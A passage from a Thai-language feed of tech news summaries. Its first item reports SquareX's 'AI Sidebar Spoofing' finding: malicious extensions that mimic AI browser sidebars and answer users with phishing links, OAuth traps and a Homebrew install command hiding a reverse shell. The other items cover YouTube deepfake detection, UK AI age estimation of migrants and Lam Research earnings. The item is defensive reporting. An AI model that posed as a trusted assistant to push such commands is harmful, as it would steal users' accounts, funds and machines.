    การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing

    SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ

    ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser

    ลักษณะของการโจมตี AI Sidebar Spoofing
    ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser
    หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI
    สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox

    ตัวอย่างการโจมตี
    ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต
    OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม
    reverse shell แฝงในคำสั่งติดตั้ง Homebrew

    จุดอ่อนของระบบ
    ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ
    ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม
    ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี

    การป้องกันจาก SquareX
    เสนอเครื่องมือ Browser Detection and Response (BDR)
    มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime
    เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี

    คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar
    อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ
    อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง
    ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล

    คำแนะนำเพิ่มเติม
    ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด
    ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง
    อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ

    https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    🕵️‍♂️ AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser ✅ ลักษณะของการโจมตี AI Sidebar Spoofing ➡️ ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser ➡️ หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI ➡️ สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox ✅ ตัวอย่างการโจมตี ➡️ ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต ➡️ OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม ➡️ reverse shell แฝงในคำสั่งติดตั้ง Homebrew ✅ จุดอ่อนของระบบ ➡️ ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ ➡️ ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม ➡️ ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี ✅ การป้องกันจาก SquareX ➡️ เสนอเครื่องมือ Browser Detection and Response (BDR) ➡️ มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime ➡️ เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี ‼️ คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar ⛔ อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ ⛔ อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง ⛔ ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล ‼️ คำแนะนำเพิ่มเติม ⛔ ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด ⛔ ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง ⛔ อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    0 Comments 0 Shares 45 Views 0 Reviews
  • YouTube เปิดตัว “Likeness Detection Tool” ป้องกันครีเอเตอร์จากภัย Deepfake

    ในยุคที่เทคโนโลยี AI ก้าวหน้าอย่างรวดเร็ว การปลอมแปลงใบหน้าและเสียงของบุคคลในวิดีโอหรือเสียงกลายเป็นเรื่องง่ายดายอย่างน่าตกใจ โดยเฉพาะกับเหล่าครีเอเตอร์ที่มีชื่อเสียงซึ่งตกเป็นเป้าหมายของการสร้างเนื้อหาเทียม (deepfake) เพื่อหลอกลวงหรือทำลายชื่อเสียง ล่าสุด YouTube ได้เปิดตัวเครื่องมือใหม่ที่ชื่อว่า “Likeness Detection Tool” เพื่อช่วยให้ครีเอเตอร์สามารถตรวจจับและจัดการกับวิดีโอที่ใช้ใบหน้าหรือเสียงของตนโดยไม่ได้รับอนุญาต

    เครื่องมือนี้เริ่มเปิดให้ใช้งานในเดือนตุลาคม 2025 โดยจำกัดเฉพาะสมาชิกในโปรแกรม YouTube Partner Program (YPP) ก่อน และจะขยายให้ครอบคลุมครีเอเตอร์ที่มีรายได้ทั้งหมดภายในเดือนมกราคม 2026

    การใช้งานเริ่มต้นด้วยการยืนยันตัวตนผ่านการอัปโหลดบัตรประชาชนและวิดีโอเซลฟี จากนั้นระบบจะสแกนวิดีโอใหม่ๆ บนแพลตฟอร์มเพื่อหาการใช้ใบหน้าหรือเสียงของครีเอเตอร์โดยไม่ได้รับอนุญาต หากพบวิดีโอที่น่าสงสัย ครีเอเตอร์จะได้รับการแจ้งเตือนผ่านแท็บ “Likeness” ใน YouTube Studio และสามารถเลือกดำเนินการ เช่น ส่งคำขอลบวิดีโอ หรือยื่นเรื่องละเมิดลิขสิทธิ์ได้ทันที

    แม้เครื่องมือนี้จะยังไม่สามารถตรวจจับการปลอมแปลงเสียงเพียงอย่างเดียวได้ แต่ก็ถือเป็นก้าวสำคัญในการปกป้องสิทธิ์ของครีเอเตอร์ และลดการแพร่กระจายของข้อมูลเท็จหรือการแอบอ้างตัวตนในโลกออนไลน์

    เครื่องมือใหม่จาก YouTube
    ชื่อว่า “Likeness Detection Tool”
    ใช้ AI ตรวจจับวิดีโอที่ใช้ใบหน้าหรือเสียงของครีเอเตอร์โดยไม่ได้รับอนุญาต
    แสดงวิดีโอที่ตรวจพบในแท็บ “Likeness” ของ YouTube Studio

    ขั้นตอนการใช้งาน
    ต้องยืนยันตัวตนด้วยบัตรประชาชนและวิดีโอเซลฟี
    ระบบจะเริ่มสแกนวิดีโอใหม่ๆ เพื่อหาการปลอมแปลง
    ครีเอเตอร์สามารถส่งคำขอลบวิดีโอหรือยื่นเรื่องละเมิดลิขสิทธิ์ได้

    กลุ่มผู้ใช้งาน
    เริ่มเปิดให้เฉพาะสมาชิก YouTube Partner Program
    จะขยายให้ครีเอเตอร์ที่มีรายได้ทั้งหมดภายในเดือนมกราคม 2026

    เป้าหมายของเครื่องมือ
    ปกป้องตัวตนของครีเอเตอร์จาก deepfake
    ลดการเผยแพร่ข้อมูลเท็จและการแอบอ้างตัวตน
    เพิ่มความน่าเชื่อถือของเนื้อหาบนแพลตฟอร์ม

    ข้อควรระวังและข้อจำกัด
    ยังไม่สามารถตรวจจับการปลอมแปลงเสียงเพียงอย่างเดียวได้
    อาจมี false positive – ตรวจพบวิดีโอที่ใช้ใบหน้าจริงของครีเอเตอร์แต่ไม่ใช่ deepfake
    การใช้งานต้องยอมรับการให้ข้อมูลส่วนตัว เช่น ใบหน้าและบัตรประชาชน

    คำแนะนำเพิ่มเติม
    ครีเอเตอร์ควรตรวจสอบวิดีโอที่ถูกแจ้งเตือนอย่างละเอียดก่อนดำเนินการ
    ควรติดตามการอัปเดตของ YouTube เกี่ยวกับการขยายขอบเขตการใช้งาน
    ควรพิจารณาความเป็นส่วนตัวก่อนสมัครใช้งานเครื่องมือนี้

    https://securityonline.info/deepfake-defense-youtube-rolls-out-ai-tool-to-protect-creator-likeness/
    🎭 YouTube เปิดตัว “Likeness Detection Tool” ป้องกันครีเอเตอร์จากภัย Deepfake ในยุคที่เทคโนโลยี AI ก้าวหน้าอย่างรวดเร็ว การปลอมแปลงใบหน้าและเสียงของบุคคลในวิดีโอหรือเสียงกลายเป็นเรื่องง่ายดายอย่างน่าตกใจ โดยเฉพาะกับเหล่าครีเอเตอร์ที่มีชื่อเสียงซึ่งตกเป็นเป้าหมายของการสร้างเนื้อหาเทียม (deepfake) เพื่อหลอกลวงหรือทำลายชื่อเสียง ล่าสุด YouTube ได้เปิดตัวเครื่องมือใหม่ที่ชื่อว่า “Likeness Detection Tool” เพื่อช่วยให้ครีเอเตอร์สามารถตรวจจับและจัดการกับวิดีโอที่ใช้ใบหน้าหรือเสียงของตนโดยไม่ได้รับอนุญาต เครื่องมือนี้เริ่มเปิดให้ใช้งานในเดือนตุลาคม 2025 โดยจำกัดเฉพาะสมาชิกในโปรแกรม YouTube Partner Program (YPP) ก่อน และจะขยายให้ครอบคลุมครีเอเตอร์ที่มีรายได้ทั้งหมดภายในเดือนมกราคม 2026 การใช้งานเริ่มต้นด้วยการยืนยันตัวตนผ่านการอัปโหลดบัตรประชาชนและวิดีโอเซลฟี จากนั้นระบบจะสแกนวิดีโอใหม่ๆ บนแพลตฟอร์มเพื่อหาการใช้ใบหน้าหรือเสียงของครีเอเตอร์โดยไม่ได้รับอนุญาต หากพบวิดีโอที่น่าสงสัย ครีเอเตอร์จะได้รับการแจ้งเตือนผ่านแท็บ “Likeness” ใน YouTube Studio และสามารถเลือกดำเนินการ เช่น ส่งคำขอลบวิดีโอ หรือยื่นเรื่องละเมิดลิขสิทธิ์ได้ทันที แม้เครื่องมือนี้จะยังไม่สามารถตรวจจับการปลอมแปลงเสียงเพียงอย่างเดียวได้ แต่ก็ถือเป็นก้าวสำคัญในการปกป้องสิทธิ์ของครีเอเตอร์ และลดการแพร่กระจายของข้อมูลเท็จหรือการแอบอ้างตัวตนในโลกออนไลน์ ✅ เครื่องมือใหม่จาก YouTube ➡️ ชื่อว่า “Likeness Detection Tool” ➡️ ใช้ AI ตรวจจับวิดีโอที่ใช้ใบหน้าหรือเสียงของครีเอเตอร์โดยไม่ได้รับอนุญาต ➡️ แสดงวิดีโอที่ตรวจพบในแท็บ “Likeness” ของ YouTube Studio ✅ ขั้นตอนการใช้งาน ➡️ ต้องยืนยันตัวตนด้วยบัตรประชาชนและวิดีโอเซลฟี ➡️ ระบบจะเริ่มสแกนวิดีโอใหม่ๆ เพื่อหาการปลอมแปลง ➡️ ครีเอเตอร์สามารถส่งคำขอลบวิดีโอหรือยื่นเรื่องละเมิดลิขสิทธิ์ได้ ✅ กลุ่มผู้ใช้งาน ➡️ เริ่มเปิดให้เฉพาะสมาชิก YouTube Partner Program ➡️ จะขยายให้ครีเอเตอร์ที่มีรายได้ทั้งหมดภายในเดือนมกราคม 2026 ✅ เป้าหมายของเครื่องมือ ➡️ ปกป้องตัวตนของครีเอเตอร์จาก deepfake ➡️ ลดการเผยแพร่ข้อมูลเท็จและการแอบอ้างตัวตน ➡️ เพิ่มความน่าเชื่อถือของเนื้อหาบนแพลตฟอร์ม ‼️ ข้อควรระวังและข้อจำกัด ⛔ ยังไม่สามารถตรวจจับการปลอมแปลงเสียงเพียงอย่างเดียวได้ ⛔ อาจมี false positive – ตรวจพบวิดีโอที่ใช้ใบหน้าจริงของครีเอเตอร์แต่ไม่ใช่ deepfake ⛔ การใช้งานต้องยอมรับการให้ข้อมูลส่วนตัว เช่น ใบหน้าและบัตรประชาชน ‼️ คำแนะนำเพิ่มเติม ⛔ ครีเอเตอร์ควรตรวจสอบวิดีโอที่ถูกแจ้งเตือนอย่างละเอียดก่อนดำเนินการ ⛔ ควรติดตามการอัปเดตของ YouTube เกี่ยวกับการขยายขอบเขตการใช้งาน ⛔ ควรพิจารณาความเป็นส่วนตัวก่อนสมัครใช้งานเครื่องมือนี้ https://securityonline.info/deepfake-defense-youtube-rolls-out-ai-tool-to-protect-creator-likeness/
    SECURITYONLINE.INFO
    Deepfake Defense: YouTube Rolls Out AI Tool to Protect Creator Likeness
    YouTube rolls out its "Likeness Detection Tool" to YPP creators, allowing them to automatically flag and remove unauthorized deepfake videos of themselves.
    0 Comments 0 Shares 35 Views 0 Reviews
  • “UK เตรียมใช้ AI ประเมินอายุผู้อพยพ – นักสิทธิมนุษยชนหวั่นเทคโนโลยีละเมิดสิทธิเด็ก”

    รัฐบาลอังกฤษเตรียมใช้เทคโนโลยี AI เพื่อประเมินอายุของผู้อพยพที่อ้างว่าเป็นเด็ก โดยเฉพาะผู้ที่เดินทางมาโดยลำพังผ่านช่องทางลักลอบ เช่น เรือเล็กจากฝรั่งเศส ซึ่งเป็นส่วนหนึ่งของมาตรการควบคุมการเข้าเมืองที่เข้มงวดขึ้น

    เทคโนโลยีที่ใช้คือ facial age estimation หรือการประเมินอายุจากใบหน้า ซึ่งจะเริ่มใช้อย่างเป็นทางการในปี 2026 โดยรัฐบาลอ้างว่าเป็นวิธีที่ “คุ้มค่าและแม่นยำ” เพื่อป้องกันไม่ให้ผู้ใหญ่แอบอ้างเป็นเด็กเพื่อรับสิทธิพิเศษในการขอลี้ภัย

    แต่กลุ่มสิทธิมนุษยชนและองค์กรช่วยเหลือผู้อพยพออกมาเตือนว่า การใช้ AI แบบนี้อาจ ตอกย้ำอคติทางเชื้อชาติ และ ละเมิดสิทธิของเด็ก โดยเฉพาะในกรณีที่ไม่มีเอกสารยืนยันอายุ หรือมีเอกสารปลอม ซึ่งอาจทำให้เด็กถูกจัดให้อยู่ในที่พักของผู้ใหญ่โดยไม่มีการคุ้มครองที่เหมาะสม

    กรณีของ “Jean” ผู้อพยพจากแอฟริกากลางที่เคยถูกระบุอายุผิดเพราะ “ตัวสูงเกินไป” จนต้องอยู่กับผู้ใหญ่และเผชิญกับความเครียดอย่างหนัก เป็นตัวอย่างของผลกระทบที่อาจเกิดขึ้นหาก AI ถูกใช้โดยไม่มีการควบคุมที่เหมาะสม

    แม้รัฐบาลจะยืนยันว่า AI จะเป็นเพียง “หนึ่งในหลายเครื่องมือ” ที่ใช้ร่วมกับการประเมินโดยเจ้าหน้าที่ผู้เชี่ยวชาญ แต่ผู้เชี่ยวชาญด้านสิทธิมนุษยชนเตือนว่า ระบบอัตโนมัติอาจขาดความโปร่งใส และ ไม่สามารถอธิบายการตัดสินใจได้ ซึ่งอาจทำให้ผู้ถูกประเมินไม่สามารถโต้แย้งผลได้

    แผนของรัฐบาลอังกฤษ
    เริ่มใช้ AI ประเมินอายุผู้อพยพในปี 2026
    ใช้เทคโนโลยี facial age estimation
    มุ่งเป้าผู้อพยพที่อ้างว่าเป็นเด็กแต่ไม่มีเอกสาร
    เป็นส่วนหนึ่งของมาตรการควบคุมการเข้าเมืองที่เข้มงวดขึ้น

    ความกังวลจากภาคประชาสังคม
    AI อาจมีอคติทางเชื้อชาติและเพศ
    เด็กอาจถูกจัดให้อยู่ในที่พักของผู้ใหญ่โดยผิดพลาด
    การประเมินอายุควรทำโดยผู้เชี่ยวชาญด้านเด็ก ไม่ใช่ AI
    ระบบอัตโนมัติขาดความโปร่งใสและตรวจสอบได้ยาก

    ตัวอย่างผลกระทบจริง
    Jean ถูกประเมินอายุผิดเพราะ “ตัวสูง”
    ต้องอยู่กับผู้ใหญ่โดยไม่มีการคุ้มครอง
    ส่งผลต่อสุขภาพจิตและความปลอดภัย
    ต่อมาได้รับการแก้ไขอายุหลังยื่นอุทธรณ์

    ความเคลื่อนไหวด้านนโยบาย
    รัฐบาลอังกฤษร่วมมือกับ OpenAI เพื่อพัฒนา AI ในหลายด้าน
    มีแผนใช้ AI ในการตัดสินคำขอลี้ภัย
    แนวโน้มการใช้ “digital fixes” เพื่อจัดการผู้อพยพเพิ่มขึ้น
    กลุ่มสิทธิเรียกร้องให้มีมาตรการคุ้มครองและความโปร่งใส

    https://www.thestar.com.my/tech/tech-news/2025/10/23/uk-use-of-ai-age-estimation-tech-on-migrants-fuels-rights-fears
    🧬 “UK เตรียมใช้ AI ประเมินอายุผู้อพยพ – นักสิทธิมนุษยชนหวั่นเทคโนโลยีละเมิดสิทธิเด็ก” รัฐบาลอังกฤษเตรียมใช้เทคโนโลยี AI เพื่อประเมินอายุของผู้อพยพที่อ้างว่าเป็นเด็ก โดยเฉพาะผู้ที่เดินทางมาโดยลำพังผ่านช่องทางลักลอบ เช่น เรือเล็กจากฝรั่งเศส ซึ่งเป็นส่วนหนึ่งของมาตรการควบคุมการเข้าเมืองที่เข้มงวดขึ้น เทคโนโลยีที่ใช้คือ facial age estimation หรือการประเมินอายุจากใบหน้า ซึ่งจะเริ่มใช้อย่างเป็นทางการในปี 2026 โดยรัฐบาลอ้างว่าเป็นวิธีที่ “คุ้มค่าและแม่นยำ” เพื่อป้องกันไม่ให้ผู้ใหญ่แอบอ้างเป็นเด็กเพื่อรับสิทธิพิเศษในการขอลี้ภัย แต่กลุ่มสิทธิมนุษยชนและองค์กรช่วยเหลือผู้อพยพออกมาเตือนว่า การใช้ AI แบบนี้อาจ ตอกย้ำอคติทางเชื้อชาติ และ ละเมิดสิทธิของเด็ก โดยเฉพาะในกรณีที่ไม่มีเอกสารยืนยันอายุ หรือมีเอกสารปลอม ซึ่งอาจทำให้เด็กถูกจัดให้อยู่ในที่พักของผู้ใหญ่โดยไม่มีการคุ้มครองที่เหมาะสม กรณีของ “Jean” ผู้อพยพจากแอฟริกากลางที่เคยถูกระบุอายุผิดเพราะ “ตัวสูงเกินไป” จนต้องอยู่กับผู้ใหญ่และเผชิญกับความเครียดอย่างหนัก เป็นตัวอย่างของผลกระทบที่อาจเกิดขึ้นหาก AI ถูกใช้โดยไม่มีการควบคุมที่เหมาะสม แม้รัฐบาลจะยืนยันว่า AI จะเป็นเพียง “หนึ่งในหลายเครื่องมือ” ที่ใช้ร่วมกับการประเมินโดยเจ้าหน้าที่ผู้เชี่ยวชาญ แต่ผู้เชี่ยวชาญด้านสิทธิมนุษยชนเตือนว่า ระบบอัตโนมัติอาจขาดความโปร่งใส และ ไม่สามารถอธิบายการตัดสินใจได้ ซึ่งอาจทำให้ผู้ถูกประเมินไม่สามารถโต้แย้งผลได้ ✅ แผนของรัฐบาลอังกฤษ ➡️ เริ่มใช้ AI ประเมินอายุผู้อพยพในปี 2026 ➡️ ใช้เทคโนโลยี facial age estimation ➡️ มุ่งเป้าผู้อพยพที่อ้างว่าเป็นเด็กแต่ไม่มีเอกสาร ➡️ เป็นส่วนหนึ่งของมาตรการควบคุมการเข้าเมืองที่เข้มงวดขึ้น ✅ ความกังวลจากภาคประชาสังคม ➡️ AI อาจมีอคติทางเชื้อชาติและเพศ ➡️ เด็กอาจถูกจัดให้อยู่ในที่พักของผู้ใหญ่โดยผิดพลาด ➡️ การประเมินอายุควรทำโดยผู้เชี่ยวชาญด้านเด็ก ไม่ใช่ AI ➡️ ระบบอัตโนมัติขาดความโปร่งใสและตรวจสอบได้ยาก ✅ ตัวอย่างผลกระทบจริง ➡️ Jean ถูกประเมินอายุผิดเพราะ “ตัวสูง” ➡️ ต้องอยู่กับผู้ใหญ่โดยไม่มีการคุ้มครอง ➡️ ส่งผลต่อสุขภาพจิตและความปลอดภัย ➡️ ต่อมาได้รับการแก้ไขอายุหลังยื่นอุทธรณ์ ✅ ความเคลื่อนไหวด้านนโยบาย ➡️ รัฐบาลอังกฤษร่วมมือกับ OpenAI เพื่อพัฒนา AI ในหลายด้าน ➡️ มีแผนใช้ AI ในการตัดสินคำขอลี้ภัย ➡️ แนวโน้มการใช้ “digital fixes” เพื่อจัดการผู้อพยพเพิ่มขึ้น ➡️ กลุ่มสิทธิเรียกร้องให้มีมาตรการคุ้มครองและความโปร่งใส https://www.thestar.com.my/tech/tech-news/2025/10/23/uk-use-of-ai-age-estimation-tech-on-migrants-fuels-rights-fears
    WWW.THESTAR.COM.MY
    UK use of AI age estimation tech on migrants fuels rights fears
    UK to use facial recognition tech to decide ages of lone child asylum seekers but critics say biases could rob many of safeguards.
    0 Comments 0 Shares 142 Views 0 Reviews
  • “Lam Research คาดรายได้พุ่ง – อานิสงส์จากความต้องการชิป AI ดันยอดขายเครื่องผลิตเซมิคอนดักเตอร์”

    Lam Research บริษัทจากแคลิฟอร์เนียที่ผลิตเครื่องมือสำหรับการสร้างเซมิคอนดักเตอร์ คาดว่ารายได้ไตรมาสหน้าจะสูงกว่าที่นักวิเคราะห์คาดการณ์ไว้ โดยมีแรงหนุนจากความต้องการชิปที่ใช้ในงานปัญญาประดิษฐ์ (AI) ที่เพิ่มขึ้นอย่างรวดเร็ว

    บริษัทคาดว่าจะมีรายได้ประมาณ $5.20 พันล้านดอลลาร์ (บวกลบ $300 ล้าน) สำหรับไตรมาสสิ้นสุดวันที่ 28 ธันวาคม 2025 ซึ่งสูงกว่าที่นักวิเคราะห์คาดไว้ที่ $4.81 พันล้าน ส่วนกำไรต่อหุ้นแบบปรับปรุงคาดว่าจะอยู่ที่ $1.15 (บวกลบ 10 เซนต์) เทียบกับประมาณการที่ $1.04

    ในไตรมาสก่อนหน้า Lam ทำรายได้ไปแล้ว $5.32 พันล้าน ซึ่งสูงกว่าที่ตลาดคาดไว้ที่ $5.23 พันล้าน และมีกำไรต่อหุ้นที่ $1.26 สูงกว่าคาดการณ์ที่ $1.22

    ความต้องการเครื่องมือผลิตชิป (Wafer Fabrication Equipment – WFE) เพิ่มขึ้นอย่างมาก เพราะบริษัทออกแบบชิปต้องการสร้างโปรเซสเซอร์ที่รองรับงาน AI ซึ่งต้องใช้เครื่องมือที่ซับซ้อนและมีความแม่นยำสูง

    แม้จะมีคู่แข่งอย่าง Analog Devices, Applied Materials และ ASML จากเนเธอร์แลนด์ แต่ Lam ยังคงรักษาตำแหน่งผู้นำในตลาด ด้วยผลิตภัณฑ์ที่ครอบคลุมตั้งแต่การประมวลผลแผ่นเวเฟอร์ไปจนถึงการเดินสายภายในชิป

    รายได้และกำไรของ Lam Research
    คาดรายได้ไตรมาสหน้า $5.20 พันล้าน (± $300 ล้าน)
    สูงกว่าประมาณการนักวิเคราะห์ที่ $4.81 พันล้าน
    กำไรต่อหุ้นคาด $1.15 (± $0.10) เทียบกับคาดการณ์ $1.04
    ไตรมาสก่อนหน้าทำรายได้ $5.32 พันล้าน และกำไรต่อหุ้น $1.26

    ปัจจัยหนุนการเติบโต
    ความต้องการชิป AI เพิ่มขึ้นอย่างรวดเร็ว
    บริษัทออกแบบชิปต้องการเครื่องมือผลิตที่แม่นยำ
    ตลาด WFE เติบโตตามการขยายตัวของ AI และ HPC
    Lam เป็นหนึ่งในผู้ผลิตเครื่องมือหลักสำหรับเซมิคอนดักเตอร์

    ตำแหน่งในตลาดและการแข่งขัน
    แข่งขันกับ Analog Devices, Applied Materials และ ASML
    Lam มีผลิตภัณฑ์ครอบคลุมทั้ง wafer processing และ wiring
    หุ้นของบริษัทเพิ่มขึ้น 2.2% หลังประกาศแนวโน้มรายได้
    ราคาหุ้นเพิ่มขึ้นเท่าตัวในปี 2025 จากแรงหนุนของตลาด AI

    https://www.thestar.com.my/tech/tech-news/2025/10/23/lam-research-expects-upbeat-quarterly-revenue-on-demand-for-chipmaking-tools
    🔧 “Lam Research คาดรายได้พุ่ง – อานิสงส์จากความต้องการชิป AI ดันยอดขายเครื่องผลิตเซมิคอนดักเตอร์” Lam Research บริษัทจากแคลิฟอร์เนียที่ผลิตเครื่องมือสำหรับการสร้างเซมิคอนดักเตอร์ คาดว่ารายได้ไตรมาสหน้าจะสูงกว่าที่นักวิเคราะห์คาดการณ์ไว้ โดยมีแรงหนุนจากความต้องการชิปที่ใช้ในงานปัญญาประดิษฐ์ (AI) ที่เพิ่มขึ้นอย่างรวดเร็ว บริษัทคาดว่าจะมีรายได้ประมาณ $5.20 พันล้านดอลลาร์ (บวกลบ $300 ล้าน) สำหรับไตรมาสสิ้นสุดวันที่ 28 ธันวาคม 2025 ซึ่งสูงกว่าที่นักวิเคราะห์คาดไว้ที่ $4.81 พันล้าน ส่วนกำไรต่อหุ้นแบบปรับปรุงคาดว่าจะอยู่ที่ $1.15 (บวกลบ 10 เซนต์) เทียบกับประมาณการที่ $1.04 ในไตรมาสก่อนหน้า Lam ทำรายได้ไปแล้ว $5.32 พันล้าน ซึ่งสูงกว่าที่ตลาดคาดไว้ที่ $5.23 พันล้าน และมีกำไรต่อหุ้นที่ $1.26 สูงกว่าคาดการณ์ที่ $1.22 ความต้องการเครื่องมือผลิตชิป (Wafer Fabrication Equipment – WFE) เพิ่มขึ้นอย่างมาก เพราะบริษัทออกแบบชิปต้องการสร้างโปรเซสเซอร์ที่รองรับงาน AI ซึ่งต้องใช้เครื่องมือที่ซับซ้อนและมีความแม่นยำสูง แม้จะมีคู่แข่งอย่าง Analog Devices, Applied Materials และ ASML จากเนเธอร์แลนด์ แต่ Lam ยังคงรักษาตำแหน่งผู้นำในตลาด ด้วยผลิตภัณฑ์ที่ครอบคลุมตั้งแต่การประมวลผลแผ่นเวเฟอร์ไปจนถึงการเดินสายภายในชิป ✅ รายได้และกำไรของ Lam Research ➡️ คาดรายได้ไตรมาสหน้า $5.20 พันล้าน (± $300 ล้าน) ➡️ สูงกว่าประมาณการนักวิเคราะห์ที่ $4.81 พันล้าน ➡️ กำไรต่อหุ้นคาด $1.15 (± $0.10) เทียบกับคาดการณ์ $1.04 ➡️ ไตรมาสก่อนหน้าทำรายได้ $5.32 พันล้าน และกำไรต่อหุ้น $1.26 ✅ ปัจจัยหนุนการเติบโต ➡️ ความต้องการชิป AI เพิ่มขึ้นอย่างรวดเร็ว ➡️ บริษัทออกแบบชิปต้องการเครื่องมือผลิตที่แม่นยำ ➡️ ตลาด WFE เติบโตตามการขยายตัวของ AI และ HPC ➡️ Lam เป็นหนึ่งในผู้ผลิตเครื่องมือหลักสำหรับเซมิคอนดักเตอร์ ✅ ตำแหน่งในตลาดและการแข่งขัน ➡️ แข่งขันกับ Analog Devices, Applied Materials และ ASML ➡️ Lam มีผลิตภัณฑ์ครอบคลุมทั้ง wafer processing และ wiring ➡️ หุ้นของบริษัทเพิ่มขึ้น 2.2% หลังประกาศแนวโน้มรายได้ ➡️ ราคาหุ้นเพิ่มขึ้นเท่าตัวในปี 2025 จากแรงหนุนของตลาด AI 